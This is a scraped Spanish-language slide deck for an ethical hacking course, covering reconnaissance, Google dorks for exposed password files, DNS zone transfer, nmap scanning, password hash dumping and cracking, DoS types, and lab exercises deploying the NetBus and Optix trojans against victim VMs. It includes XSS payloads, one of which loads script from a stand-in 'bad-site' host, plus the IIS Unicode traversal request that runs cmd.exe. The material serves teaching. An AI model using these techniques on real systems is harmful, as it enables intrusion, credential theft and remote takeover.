La descarga está en progreso. Por favor, espere

La descarga está en progreso. Por favor, espere

Técnicas de Prevención y

Presentaciones similares


Presentación del tema: "Técnicas de Prevención y"— Transcripción de la presentación:

1 Técnicas de Prevención y
Ejecución de Hacking Prof. Reinaldo N. Mayol Arnao

2 Fases de un Ethical Hacking

3 Reconocimiento El levantamiento comienza por: 1. Búsqueda del nombre de dominio (empresa.com) 2. Localización física de la empresa, direcciones, teléfonos, direcciones de correo electrónico

4 Reconocimiento 3. Búsqueda sobre información de la empresa en google y otros motores de búsqueda, blogs, noticias, foros, etc. Búsqueda de versiones en páginas como 4. Búsqueda de Intranet, proyectos, versiones beta de la empresa, conseguir acceso a la Intranet puede brindar información valiosa de la misma. Normalmente, se pueden inferir los sitios internos de las empresas:intranet.empresa.com,beta.empresa.com, www2.empresa.com, etc. 5. Existen herramientas como DNS Enumerator, Spider Foot, DNS Stuff que te ayudan a realizar la busque

5 Sección Práctica Práctica:Archive.org Ambiente: Cualquiera
Vaya al sitio Web: utilice la herramienta para buscar versiones anteriores de su sitio web.

6 Sección Práctica

7 Así éramos el 21 Febrero del 2006
Sección Práctica Así éramos el 21 Febrero del 2006

8 Sección Práctica Práctica:Archive.org Ambiente: Cualquiera
Vaya al sitio Web: utilice la herramienta para buscar versiones anteriores de su sitio web.

9

10

11 Sección Práctica Práctica:dnsstuff Ambiente: Cualquiera

12 Google Hacking Muchas aplicaciones mal instaladas, o instaladas por defecto, errores de configuración, etc, terminan publicando información que no debería ser publica en Internet. Esta información es indexada por los buscadores y por lo tanto, terminan siendo disponibles para el ethical hacker o para el criminal informático. En particular, las capacidades avanzadas de búsqueda de google son extraordinariamente flexibles. Las búsquedas comunes y corrientes contienen texto a ser buscado en el cuerpo de la página Web. Sin embargo, las búsquedas avanzadas pueden especificar tipos de archivos, textos en distintas partes de la página no solo el cuerpo, patrones de números, firmas de aplicaciones, etc. Algunos modificadores de este tipo son: Inurl: Texto en el URL de la pagina. Intext: Texto libre. Site: Especifica un dominio. Filetype: Tipo de archivos a buscar.

13 Google Hacking Sección Práctica: Obtener Cuentas: inurl:account filetype:xls Obtener passwords: inurl:passwords filetype:xls Obtener info sobre sistemas: intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers." Busqueda de dispositivos: inurl:indexFrame.shtml Axis (WebCams) intext:centreware inurl:status (Printers) El sitio web donde todo esto ocurre se llama the Google Hacking Database:

14 Google Hacking Análisis de Resultados: El google hacking esta muy bien para los “hacks accidentales”. Es bastante obvio que cuando estamos tratando de evaluar un sitio en especifico, es imposible probar todos los posibles google hacks junto con el modificador site:dominio.tld. Por cierto, justamente esta idea esta detrás del famoso scanner “goolag” desarrolaldo hace poco por el cDc. A pesar de que hicieron esta idea impractica en realidad, lo que sucede al ejecutarla es que google bloquea nuestro IP por gran numero de búsquedas. Sin embargo, goolag esta incluido en el CD de herramientas porque no deja de ser una excelente compilación de “google dorks”.

15 Google Hacking Práctica Número 8: Instalar Goolag Realizar un scan de unos cuantos google dorks para algún site externo. Notar el número de scans antes de ser bloqueados. * Es esto ilegal? Notar la gran cantidad de google dorks recopilados. Análisis de Resultados: Por supuesto, los atacantes también saben esto y es irreal pensar que esto sucede en el mundo real. Lo que sucede en el mundo real es que información es recopilada de una forma mucho mas deterministica. En los tiempos de antes, el evaluador y el atacante se sentarían a revisar cada uno de los resultados de sus sofisticadas búsquedas para interpretar la información y decidir cual era relevante o importante para su proyecto. Esto ya no es así. La evolución del google Hacking se llama: Paterva.

16 Paterva – Maltego Maltego es un programa que es capaz de determinar relaciones entre personas y enlaces del mundo real entre: Gente Grupos de gente (Social networks) Compañías Sitios Web Infraestructura de Internet tales como - Dominios - Nombres DNS - Netblocks - Direcciones IP. Frases Afiliaciones Archivos y documentos. Estas entidades son relacionadas utilizando inteligencia artificial

17 Paterva – Maltego Sección Práctica Utilizar Maltego para ver que información pueden obtener sobre personas, organizaciones, correos electrónicos, etc.

18 Técnicas y herramientas de Hacking
En este momento ya tenemos un buen número de herramientas para recopilar información de nuestros objetivos. A partir de todas las técnicas anteriores debemos tener unos cuantos nombres de dominio, rangos de direcciones IP, etc. Con estos pedazos de información es momento de empezar a determinar puntos débiles en concreto en donde podamos ejecutar técnicas específicas para violar mecanismos de protección. Si reflexionamos un poco sobre todo lo anterior, no se ha violentado ninguna tecnología, no se ha abusado de ningún privilegio. Toda la información obtenida ha sido recopilada por medios públicamente disponibles. El siguiente grupo de herramientas nos empieza a llevar a una zona mas gris.

19 Técnica de Zone Transfer
Sección Práctica: Ejecutar un ataque de transferencia de zona con nslookup. nslookup set type=NS dominio.com server servidordns.dominio.com set type=any ls –d dominio.com Todos los dominios bien configurados deben responder con un “transacción rehusada”. En caso contrario esta secuencia de comandos nos devuelve una lista de hosts con sus nombres de acuerdo a los records del servidor DNS que fue preguntado. Algunos servidores DNS también pueden responder con datos incorrectos para despistar atacantes. Salvo casos muy especiales, las transferencias de zonas no deberían permitirse a la internet en general.

20 Fase 2: Rastreo En esta etapa el atacante intenta descubrir, enumerar e inventariar los equipos de la red a la que quiere acceder. Específicamente, el atacante desea recolectar información acerca de las direcciones IP, su sistema operativo, la arquitectura de sistemas de la víctima y los servicios que cada equipo de su red está ejecuta.

21 Objetivo de la fase de rastreo

22 Un viejo amigo: NMAP

23 Tipo de rastreos de NMAP

24 Tipo de rastreos de NMAP
Syn Stealth o Half Open: Se envía un paquete SYN a un puerto del equipo, lo que sugiere que se está solicitando una conexión, una respuesta es esperada. Si el puerto está abierto enviará un paquete SYN/ACK. Por el contrario, si el puerto está cerrado enviará un paquete RST. La ventaja de este tipo de escaneo es que muy pocos sitios registran este tipo de actividad.

25 Tipo de rastreos de NMAP
FIN Scan: Sólo funciona con equipos con TCP/IP desarrollado de acuerdo al RFC 793, si se realiza con Windows la respuesta será que todos los puertos están cerrados. El escaneo consiste en enviar un FIN, si el puerto está abierto se recibirá NO RESPONSE...si el puerto está cerrado se recibirá un RST/ACK.

26 Tipo de rastreos de NMAP
NULL Scan: Este tipo de rastreo sólo funciona con equipos con TCP/IP desarrollado de acuerdo al RFC 793. Si se realiza con Windows la respuesta será que todos los puertos están cerrados. El escaneo consiste en enviar un paquete sin banderas configuradas, si el puerto está abierto se recibirá NO RESPONSE...si el puerto está cerrado se recibirá un RST/ACK

27 Tipo de rastreos de NMAP
Window Scan: Este rastreo es similar al ACK, la detección se realiza revisando el tamaño de las ventanas. ICMP Echo Scan: Esta opción no es realmente un tipo de rastreo dado que ICMP tiene abstracción de puertos, pero es útil para determinar qué equipos de una red están arriba haciendo ping. List Scan: Este tipo de escaneo simplemente genera e imprime la lista de Ips/nombres sin hacer ping o escaneo de puerto. En realidad se realiza una resolución de nombres (DNS)

28 Tipo de rastreos de NMAP
Bounce Scan: Este tipo de rastreo utiliza la vulnerabilidad de los servidores FTP para los ataques de bounce. Esta vulnerabilidad permite que una persona solicite al servidor FTP abrir una conexión con un tercero en un puerto en particular. Cómo el atacante puede utilizar el FTP también podrá recibir los resultados. El ataque bounce es similar a la usurpación de IP (IP Spoofing). El anonimato del atacante se mantiene. También es bueno evadiendo cortafuegos y permite acceso a redes locales.

29 Tipo de rastreos de NMAP
Reverse Ident Scan: El protocolo Ident permite que se muestren los usuarios dueños de procesos conectados vía TCP, incluso si ese proceso no comenzó la conexión. De esta forma una conexión puede establecerse por HTTP y luego utilizar ident para identificar qué servidor está corriendo como root.

30 Tipo de rastreos de NMAP
RPC Scan: Este método funciona en combinación con otros tipos de rastreos de puertos. Funciona escaneando todos los puertos TCP/UDP y luego los inunda con un programa de SunRPC con comandos nulos en un intento de determinar si son puertos RPC, si lo son, trata de determinar qué versión tienen y programas están sirviendo.

31 Tipo de rastreos de NMAP
Blaster Scan: Este es un rastreo de puertos TCP sistemas para basados en *nix. Realiza ping a los equipos para determinar conectividad, escanea segmentos de red, accesos anónimos a servidores FTP, vulnerabilidades CGI, POP3 y FTP (para ataques de fuerza bruta).

32 Otras opciones importantes: decoys

33 ¿Cómo se detecta el sistema operativo?

34 Sección Práctica Práctica:p0f Ambiente: Linux
P0f es una herramienta para obtener información remota sobre el sistema operativo y versiones de servidor de una máquina. Su principal característica es que no deja huella en los firewalls y sistemas de detección de intrusos (a diferencia de ratreadores de puertos activos como Nmap.) Abra un shell en linux Ejecute p0f –i <el número de interfaz de su tarjeta de red> Abra un navegador (browser), observe los resultados.

35 Sección Práctica Práctica:Cheops Ambiente: Linux
Cheops es una herramienta para sistemas linux que permite detección de sistemas operativos, servicios activos en una red, escaneo de puertos, etc.. Abra un shell Ejecute la herramienta ( simplemente ejecute el comando cheops)

36 Cheops

37 Búsqueda de Vulnerabilidades
Otro camino común utilizado en esta etapa es la búsqueda de vulnerabilidades que puedan ser explotables. Existen innumerables herramientas que pueden ser utilizadas para este fin.

38 Escondiéndose Proxy: es un servidor que puede ser utilizado cómo intermediario para conexiones con otros equipos. Es común utilizar servidores distribuidos por varios países de forma es esconder el origen real de la intrusión.

39 Buscando “free Proxy Servers”

40 TOR Tor es una de las herramientas de proxy-socks mas conocidas y utilizadas. Funciona re-direccionando todo el tráfico a un servidor anónimo y cifrando los datos entre ese servidor tor y el cliente ( no entre el servidor tor y el destino)

41 TOR en acción

42 TOR…eando

43 Enumerando El término enumeración se emplea para designar el proceso de extracción de cuentas de usuario, privilegios de las cuentas, nombres de equipo, etc. Algunas técnicas de enumeración para la extracción de usuarios: 1. W2K 2. SNMP 3. Utilizando los IDs de correo electrónico 4. Extrayendo información con usuarios por omisión 5. Fuerza bruta contra directorio activo.

44 Sección Práctica Práctica: getacc Ambiente: Windows Ejecute el programa Getacct ( get account) contra el sistema víctima de su red.

45 NULL Sesion Lista de usuarios y grupos Lista de equipos
Las sesiones nulas toman ventaja de una vulnerabilidad en el CIFS/SMP (Common Internet File System/Server Messaging Block). Se puede establecer una sesión nula con un equipo de Windows /(NT/2000), con un usuario nulo y su password. Utilizando una sesión nula se puede recabar información sobre el equipo como: Lista de usuarios y grupos Lista de equipos Lista de servicios compartidos Usuarios y SIDs (Security Identifier)

46 Fase 3: Toma de Control Luego de lograr el acceso el hacker tratará de escalar privilegios y ejecutar aplicaciones o exploits de forma encubierta. Una forma común de encubrimiento son los rootkits. Los rootkits se instalan en el kernel y tienen la habilidad de esconderse y encubrir sus actividades.

47 Fase 3: Toma de Control Cuando se instala un rootkit se reemplazan llamados del sistema operativo por versiones o rutinas modificadas que contienen la ejecución de script o aplicación adicional al llamado natural que realiza la función. Un rootkit puede: Esconder procesos, archivos, entradas en el registro interceptar comandos, solicitar debug (causando los famosos pantallazos azules), redirigir archivos .

48

49

50 ¿Por qué son comprometidos los sitios Web?

51 ¿Cómo son comprometidos?
(entre muchas causas) Obtención de identidades mediante ataques de “ hombre en el medio”. Envenenamiento del Cache del DNS. Explotando errores de los programas. Explotando configuraciones incorrectas. Envenenamiento de URL Inyecciones SQL DoS

52 Algunos ejemplos Cross-Site Scripting
En HTML, existen caracteres “especiales”, que se utilizan para que el servidor y los navegadores puedan diferenciar entre texto normal ( mostrado) y elementos que proporcionan diferentes funcionalidades. Cross-Site Scripting es una vulnerabilidad que puede ser explotada mediante la inserción de caracteres especiales en la comunicación cliente-servidor, en forma de scripts, contentivo de código malicioso.

53 Cross-Site Scripting, ejemplos
<A HREF= “http://sitio.com/comment.cgi? mycomment=<SCRIPT>codigo-malicioso</SCRIPT>"> Click here</A> <A HREF= “http://sitio.com/comment.cgi? mycomment=<SCRIPT SRC=‘http://bad-site/badfile'> </SCRIPT>"> Click here</A> > Click here > Click here", "width": "800" }

54 Una situación real Imagine que ud. Ha recibido un correo electrónico con una invitación a un paseo. Para ir al paseo, ud. debe llenar un formulario con sus datos. El tiene un link que amablemente lo llevará al formulario. El link tiene la forma El código del link dice: ", "width": "800" }

55 Que sucede Usuario Confiado… Server Vulnerable Usuario Envía Solicitud
Server Devuelve HTML con código malicioso incluido ( el server cree que es el nombre del usuario) Usuario confiado pierde el Control de su máquina, el código malicioso Se lo ha entregado a un extraño

56 “Web Server Folder Transversal Vulnerability”
Esta vulnerabilidad permite a usuarios externos obtener acceso a máquinas corriendo IIS 4.0 o IIS 5.0 a través de URL’s “malformadas” Ej: Microsoft IIS efectúa una verificación de seguridad sobre cada CGI URL ejecutado para asegurar que el requerimiento no use ninguna secuencia ‘../’ Pero.. Dado que la codificación Unicode del caracter ‘/’ es ‘%c0%af’, si se reemplaza la secuencia ‘../’ por ‘..%c0%af’ este no será rechazado por la verificación inicial, ya que dicho proceso no encuentra ninguna ocurrencia de los caracteres ‘../’ sólo verá una secuencia ‘..%c0%af’ válida. GET/scripts/..%c0%af/winnt/system32/cmd.exe?/ c+dir=c:\ HTTP/1.0

57 ‘%c0 es el código de la tabla Basic Latin
¿Por qué ‘%c0%at? ‘%c0 es el código de la tabla Basic Latin Pero, %af > %7f, lo Que significa que el sistema “da la vuelta” ,%80-%af=%2f %2F El número más grande es %7f ( 127 D)

58 Otras vulnerabilidades “famosas”
RPC DCOM RPC (Remote Procedure Call o Llamada de Procedimiento Remoto), es un protocolo utilizado por Windows, que proporciona un mecanismo de comunicación entre procesos internos, y que permite que un programa ejecutándose en una computadora pueda acceder a los servicios de otra, de manera transparente para el usuario

59 Otras vulnerabilidades “famosas”
Windows posee un servicio llamado DCOM (Distributed Component Object Model o Modelo de Objeto Componente Distribuido), que permite a los objetos COM comunicarse entre a través de la red. Un atacante puede utilizar los puertos TCP/UDP 135 (RPC), 139 y 445 (NetBIOS), 593 (RPC/http), o cualquier puerto habilitado por IIS para alcanzar los servicios DCOM vulnerables.

60 Otras vulnerabilidades “famosas”
Existen innumerables vulnerabilidades descritas y explotables utilizando los servicios DCOM. Un atacante que tenga éxito en aprovecharse de estas vulnerabilidades, podría ejecutar un código capaz de tener todos los privilegios del sistema local de un sistema afectado.

61 Sección Práctica Práctica: RPC Exploit-GUI Ambiente: MS. Windows
1-Ejecute la Herramienta RPC E-Gui que le entregará el instructor. 2-Localice a la víctima de su ataque. 3- Ejecute el ataque. (SÓLO UNA VEZ) 4- Evalúe la consecuencias del mismo.

62 XXXXXXX.com.ve [XXX.XXX.XXX.116] 80 (www) open HTTP/1.1 200 OK
echo -e "GET / HTTP/1.0\n\n" | nc -vv 80 XXXXXXX.com.ve [XXX.XXX.XXX.116] 80 (www) open HTTP/ OK Date: Fri, 21 Nov :21:22 GMT Server: Apache/ (Ubuntu) PHP/ ubuntu4.3 X-Powered-By: PHP/ ubuntu4.3 Connection: close Content-Type: text/html

63 Robo de Contraseñas

64 Autenticación El modelo más común de autenticación permite identificar a un usuario, una aplicación o a un servicio utilizando una pareja de ID- Clave En un contexto más amplio existen varios modelos adicionales de autenticación: Kerberos Certificación Digital

65 Esquemas de Autenticación
Autenticación HTTP • AutenticaciónBasica • Digest Autenticación Autenticación Windows (NTLM) Autenticación con Certificados Digitales o Claves RSA Secure Token Biometría

66 Autenticación HTML Básica

67 Digest Authentication
La contraseña no se utiliza directamente en la autenticación, sino, por ejemplo: HA1 = MD5 (nombre de usuario: entorno: contraseña). Se basa en el esquema reto- respuesta

68 Digest Authentication
Servidor de Autenticación Cliente Servidor Envía Reto Usuario envía Reto Cifrado Usuario Cifra Reto con Clave Servidor compara reto enviado con reto recibido LA CLAVE NUNCA PASA POR LA RED!!

69 Autenticación NTLM Constituye una variante de la autenticación mediante resúmenes criptográficos. Se trata igualmente una forma segura de autenticación en la medida en que no se envían ni la contraseña ni el nombre de usuario a través de la red. Sólo está soportado por Microsoft Internet Explorer, versión 2.0 o posterior y servidores NT. No funciona para conexiones con proxy.

70 ¿Cómo ocurre la autenticación en redes Microsoft?
Cuando un usuario envía la orden para acceder a \\maquina\recurso_compartido se efectúan los siguientes pasos: Establecimiento de sesión TCP Establecimiento de sesión NetBIOS Negociación SMB (Server Message Block) Autenticación Challenge-Response

71 SMB SMB (Server Message Block) es el protocolo a nivel capa Aplicación usado en las redes Microsoft. Por razones de compatibilidad, los nuevos sistemas operativos siempre “comprenden” a los anteriores. Durante la negociación el cliente envía la lista de dialectos que comprende, el server selecciona uno en común (normalmente el más nuevo) y devuelve esa información al cliente. Conjuntamente con esa información el servidor envía el reto.

72 Kerberos El servidor de Kerberos en Windows 2000 es un Controlador de Dominio. Todos los controladores de dominio Windows 2000 proveen el servicio Kerberos a la red. Kerberos está basado en la técnica de “Secreto- Compartido”. Si tanto cliente, como usuario y como server, tienen cuenta en el dominio hay un secreto- compartido entre cada uno de ellos y el Controlador de Dominio.

73 Kerberos

74 Autenticación basada en Claves y Certificados

75 Ej. de extensiones

76 SSL Usando C. Asimétrica | D.Hellman C.Simetrica

77 Sección Práctica Práctica: PWDUMP, LC4 Ambiente: MS. Windows
LOS ELEMENTOS AQUÍ PLANTADOS SON SÓLO UNA PRUEBA DE CONCEPTOS, NO DEBEN SER UTILIZADOS CON OTROS FINES.

78 PWDump Ejecute la herramienta en línea de comando en su equipo.
pwdump ip_del_equipo ruta_de_archivo id Cuando la herramienta le indique completed busque en el sitio donde guardo el archivo. En el archivo tendrá un listado de usuarios y un campo dónde podrá visualizar el hash del password. Utilice LC4 Una vez que ejecute la herramienta importe el archivo .txt que realizo con el pwdump Ejecute la opción begin audit y podrá descifrar el password

79 DoS

80 Tipos Generales "flood" “Man-in-the-middle “Block Users”
“Block Services”

81 ¿Como se inicia un DoS? Se comienza un ataque de DoS explotando una vulnerabilidad en un sistema informático. Es del sistema principal que el intruso identifica y se comunica con otros sistemas que puedan ser comprometidos. La idea detrás de un ataque de este tipo es dejar fuera al sistema víctima, principalmente por inanición de recursos. La principal dificultad radica en detener el ataque y reconocer las solicitudes apócrifas de las verdaderas.

82 Algunos Ataques de DoS SYN flood TCP FIN flood Connection flood
Land Atack finger bomb bomb MAC flooding DNS flood Supernuke/Winnuke Teardrop/Newtear Paquetes fragmentados Bucle UDP/Snork UDP

83 Tipos de Ataques DoS : Ataque Individual de Negación de Servicios
DdoS: Ataque Distribuido de Negación de Servicios.

84 DoS y DDoS

85 Ping de la Muerte A atacante deliberadamente envía datagramas IP mayores de los 64 KB permitidos por el protocolo IP. El proceso de fragmentación hace que el paquete sea “ picado” en fragmentos. Cada fragmento su vez puede tener hasta 64 KB El sistema operativo vulnerable no es capaz de manejar la situación y falla.

86 Smurf Enviar un paquete ICMP-Echo-Request a un‘SMURF amplifier’ network (A- class broadcast address). Todos los ordenadores de esa red responden a la dirección de origen

87 ¿Qué es un Troyano? Un Troyano es un pequeño programa que corre a escondidas y que infecta a un computador. Con la ayuda de un Troyano, un atacante puede obtener acceso a passwords, modificar parámetros de operación de la computadora infectada, etc.

88 Tipos de Troyanos Security Software Disablers Destructive
Remote Access Data-Sending Denial-of-Service (DoS) Attack Proxy

89 Puertos utilizados por (algunos) troyanos
Back Orifice /UDP Deep Throat 2140, 3150/UDP NetBus 12345,12346/TCP NetBus 2 Pro 20034/TCP

90 Sección Prácticas Práctica: NetBUS Ambiente: MS. Windows
LOS ELEMENTOS AQUÍ PLANTADOS SON SÓLO UNA PRUEBA DE CONCEPTOS, NO DEBEN SER UTILIZADOS CON OTROS FINES.

91 NetBUS El instructor le entregará una máquina virtual a la que llamaremos víctima. En la máquina “ atacante” , la suya, encontrará un carpeta llamanda netbus. Existen 2 archivos importantes: NetBUS.exe (CLIENTE, Ud.) y PATH. Exe ( SERVIDOR, su víctima) NO EJECUTE PATH EN SU MAQUINA!!!! Envíe el archivo path.exe a la máquina víctima, espere a que se ejecute. Ahora ejecute ud. netbus y ponga la IP de su víctima.

92 NetBus

93 Sección Prácticas Práctica: Optix Ambiente: MS. Windows
LOS ELEMENTOS AQUÍ PLANTADOS SON SÓLO UNA PRUEBA DE CONCEPTOS, NO DEBEN SER UTILIZADOS CON OTROS FINES.

94 Optix Con optix, construiremos tanto un cliente como un servidor, al igual que con el netbus abra que hacer llegar una parte a la víctima. CUIDADO!!! NO CORRA EL PROGRAMA QUE CONTRUYA CON BUILDER EN SU PROPIA MAQUINA O LA INFECTARÁ

95 Optix: Builder

96 Optix: Builder Luego de elegir las opciones que desee, construya el troyano. RECUERDE NO EJECUTAR EL PROGRAMA CREADO EN SU MAQUINA

97 Optix: Client

98 RECUERDE... Las anteriores demostraciones sólo tienen
como objetivo probar conceptos, no las utilice en otras situaciones o podría incurrir en delitos

99 Sección Prácticas Práctica: Super Helper Tool Ambiente: MS. Windows
Esta es una herramienta que permite verificar los procesos que están corriendo de manera independiente al sistema operativo, detectar y detener troyanos y virus.

100 NetBUS

101 Sección Prácticas Práctica: xxxxxxxxxxx Ambiente: xxxx
LOS ELEMENTOS AQUÍ PLANTADOS SON SÓLO UNA PRUEBA DE CONCEPTOS, NO DEBEN SER UTILIZADOS CON OTROS FINES. Presione simultáneamente las teclas WINDOWS y R en la máquina virtual que hemos utilizado de atacante. ¿Sorprendido?


Descargar ppt "Técnicas de Prevención y"

Presentaciones similares


Anuncios Google